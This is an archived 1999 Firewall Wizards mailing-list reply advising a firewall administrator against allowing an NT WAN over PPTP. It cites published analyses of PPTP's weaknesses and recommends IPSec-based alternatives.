Firewall Wizards mailing list archives
Re: NT WAN
From: "Kevin T. Shivers" <kts () clark net>
Date: Tue, 27 Jul 1999 10:31:37 -0400 (EDT)
On Mon, 26 Jul 1999, Neil Ratzlaff wrote:
I am looking for some strong reasons to refuse to allow an NT WAN through the firewall. There is a department here that wants to set up a wide area network of several NT machines scattered over several states. All they have said they want is to share files and printing. One of the local hosts would be behind the firewall, and they wanted to know how to get through the firewall, so I got called in. I manage the firewall, but I don't do policy of any kind. I assume they would at least use PPTP, but I read recently that although M$ improved it, it still is not very secure.
You are 100% correct. Bruce Schneier and Dr. Mudge wrote a really good paper that you probably know about, showing how bad PPTP was. They recently wrote another paper on the strengths and weaknesses in the new PPTP extensions to make it more secure (MS-CHAPv2). The paper can be found at: http://www.counterpane.com/pptpv2-paper.html . The conclusion of the paper states that "Microsoft has improved PPTP to correct the major security weaknesses described in [their previous paper]. However, the fundamental weakness of the authentication and encryption protocol is that it is only as secure as the password chosen by the user." The paper also goes to say that IPSec is a much better idea, so you may want to look at IPSec solutions for NT. PGPNet VPN stuff may also be something to look into. I haven't used it yet, but some of my co-workers have and they really like it. You can find that somewhere off of NAI's web site.
Is there some paper somewhere that I can point to that shows why this is a bad idea? Perhaps vulnerabilities that can't be patched? I appreciate any help anyone can provide.
Like I listed above, http://www.counterpane.com/pptpv2-paper.html has the most up to date info on PPTP, but http://www.counterpane.com/pptp.html also has some good information. I'd also recommend looking at the NTBugTraq archives at http://www.ntbugtraq.com/ . kts -- Kevin T. Shivers NT & UNIX Security Consultant Shivers Consulting http://www.clark.net/pub/kts kts () clark net
Current thread:
- NT WAN Neil Ratzlaff (Jul 27)
- Re: NT WAN mritenburg (Jul 27)
- Re: NT WAN Kevin T. Shivers (Jul 27)
- <Possible follow-ups>
- re: Re: NT WAN MHurlburt (Jul 29)